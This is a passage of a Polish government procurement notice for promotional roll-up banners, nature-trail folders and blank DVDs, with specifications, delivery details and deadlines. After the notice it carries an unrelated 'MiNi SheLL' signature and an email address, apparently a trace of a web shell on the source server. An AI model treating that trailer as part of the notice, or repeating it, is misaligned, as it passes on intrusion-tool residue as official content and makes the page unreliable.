-	 wycięcie owalnego otworu w miejscu łba zwierzęcia (żubra lub wilka) na tzw. główkę umożliwiającą wykonanie zdjęcia pamiątkowego, na którym twarz fotografowanej osoby będzie wpisana w postać wilka lub żubra,
-	 rozmiar otworu powinien być dostosowany do ludzkiej twarzy, wysokość umieszczenia otworu będzie uzależniona od zdjęcia zastosowanego w tle;
b)	 roll-up typ II bez tzw. główek - 6 sztuk, w tym:
-	 3 roll-upy przedstawiające żubry oraz 3 roll-upy przedstawiające wilki,
B.	 opis ogólny dla roll-up typ I  z tzw. główkami oraz roll-up typ II bez tzw. główek:
a)	  panel grafiki: wykonany z materiału tekstylnego półbłyszczącego lub matowego;
b)	 nadruk na panelu: grafika wypełnienia 100%, full kolor, jednostonny;
c)	 grafika wykonana w technice odpornej na uszkodzenia (uszkodzenia mechaniczne, uszkodzenia na skutek warunków atmosferycznych, itp.);
d)	 maszt: składany dwu lub trzyczęściowy z regulowaną wysokością w zakresie 160-220 cm, aluminiowy;
e)	 mocowanie grafiki: listwa zatrzaskowa aluminiowa, umożliwiająca łatwą wymianę grafiki;
f)	 rozmiar panelu grafiki: 100 cm x 200 cm;
g)	 nadruk zawierał będzie nazwę i LOGO Zamawiającego oraz dane teleadresowe, informację o dofinansowaniu ze środków NFOŚiGW wraz z LOGO Funduszu, tytuł projektu w ramach którego wykonano roll-upy, tło będą stanowiły fotografie wilka lub żubra - Zamawiający dostarczy Wykonawcy fotografie, (schemat nadruku na roll-up - załącznik nr 7 do SIWZ); Wykonawca wykona 3 projekty grafiki, z których Zamawiający wybierze jeden; Zamawiający zastrzega sobie prawo wprowadzania w zaakceptowanym projekcie poprawek;
h)	 kaseta z aluminium z 2 nogami stanowiąca podstawę stojaka, z mechanizmem samozwijającym;
i)	 waga pojedynczego roll-upu zapakowanego w torbę transportową do 8 kg;
j)	 torba transportowa futerał (osobna na każdy roll-up);
k)	 termin realizacji do 2 tygodni od dnia podpisania umowy;
l)	 dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13, 78-520 Złocieniec, tel. 94 36 70 920;
m)	 kod CPV 22462000-6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - opracowanie graficzne, przygotowanie do druku oraz druk folderów ścieżka przyrodnicza Kamienna Buczyna oraz ścieżka przyrodnicza Łąki Studnickie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka przedmiotu zamówienia: kod CPV 22462000-6
A.	 Opracowanie graficzne folderów:
a)	 opracowanie graficzne folderów obejmie wykonanie przez Wykonawcę projektu graficznego folderów wraz z autorskimi elementami graficznymi, a także komputerowy skład i łamanie oraz przygotowanie do druku folderów w języku polskim zgodnie z Zasadami składu tekstów w języku polskim (PN-83/P-55366);
b)	 projekty graficzne folderów Ścieżka przyrodnicza Kamienna Buczyna oraz Ścieżka przyrodnicza Łąki Studnickie należy wykonać w podobnej stylistyce (układ treści, kolorystyka, rodzaj czcionki, itp.) tak aby wizualnie stanowiły komplet;
c)	 Zamawiający w ramach umowy dostarczy Wykonawcy poglądowe mapy przebiegu ścieżek oraz dokumentację fotograficzną obrazującą sytuację przyrodniczą i zasoby dydaktyczne ścieżek;
d)	 Wykonawca przeprowadzi niezbędną obróbkę graficzną otrzymanych materiałów w celu uzyskania jak najwyższej jakości estetycznej folderów;
e)	 elementy graficzne folderów będą stanowiły ok. 70% ich objętości;
f)	 udostępnione przez Zamawiającego materiały fotograficzne i mapy, a także elementy graficzne opracowane na potrzeby folderów nie mogą być wykorzystywane w całości ani w części do innych publikacji przygotowywanych przez Wykonawcę dla osób trzecich; 
g)	 Wykonawca przed przystąpieniem do prac związanych z przygotowaniem do druku folderów przedstawi Zamawiającemu do akceptacji ich projekty graficzne;
h)	 majątkowe prawa autorskie do projektów graficznych folderów, w tym rysunków  i innej grafiki, przechodzą w całości na Regionalną Dyrekcję Ochrony Środowiska  w Szczecinie (dalej RDOŚ) na wszystkich polach eksploatacji niezbędnych dla korzystania z nich. Przenoszone majątkowe prawa autorskie nie będą w chwili przejścia na RDOŚ obciążone prawami na rzecz osób trzecich, a także osoby uprawnione z tytułu osobistych praw autorskich nie będą wykonywać takich praw w stosunku do RDOŚ lub jej następców prawnych. Z chwilą przejścia na RDOŚ w Szczecinie majątkowych praw autorskich do projektów graficznych folderów, RDOŚ w Szczecinie udzieli nieodpłatnie NFOŚiGW licencji na czas nieokreślony do nieodpłatnego korzystania z projektów folderów zgodnie z ustaleniami zawartymi  w umowie pomiędzy RDOŚ w Szczecinie i NFOŚiGW  o realizację ww. zadania;
i)	 żadna osoba fizyczna lub prawna nie będzie zgłaszała roszczeń w stosunku do Zamawiającego oraz NFOŚiGW z tytułu praw autorskich projektów użytych lub powstałych w związku z realizacją zadania. Wykonawca we własnym zakresie ureguluje sprawy związane z prawem autorskim użytych elementów graficznych.
B.	 Przygotowanie do druku oraz druk folderów:
a)	Wykonawca zapewni druk folderów w polskiej wersji językowej;
b)	 nakład: folder ścieżki przyrodniczej Kamienna Buczyna - 3000 szt., folder ścieżki przyrodniczej Łąki Studnickie - 3000 szt.;
c)	 format: A4 (297x210), składane w Z do DL;
d)	 papier: kreda błyszcząca, 150 g;
e)	 kolor: 4+4;
f)	 uszlachetnienia: zabezpieczenie lakier offset - dwustronnie;
g)	 Wykonawca przedstawi Zamawiającemu przed drukiem do akceptacji próbny wydruk full color obu folderów;
h)	 wydrukowane foldery zostaną dostarczone i wniesione na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13,   78-520 Złocieniec, tel. 94 36 70 920;
i)	 termin realizacji: do 2 tygodni od dnia podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - dostawa 32 płyt DVD wraz z opakowaniami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka przedmiotu zamówienia:
a)	 kod CPV 22462000-6, 30234400-2;
b)	 32 płyt DVD z opakowaniami;
c)	 pudełka otwierane - ilość 32 szt. (każda z płyt będzie osobno opakowana), wykonane z kolorowego (np. czarnego) lub bezbarwnego tworzywa, elastycznego i trudnołamliwego, z możliwością umieszczenia drukowanej okładki;
d)	 wielkość pudełka: 12,8 cm x 12,5 cm;
e)	 grubość grzbietu pudełka 5 mm lub wymiary zbliżone, umożliwiające bezpieczne przechowywanie płyty;
f)	 płyta o pojemności min. 4,7 GB, x 16,120 min;
g)	 powierzchnia płyty bez nadruków;
h)	 termin realizacji do 2 tygodni od dnia podpisania umowy;
i)	 dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13, 78-520 Złocieniec, tel. 94 36 70 920.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 30.23.44.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com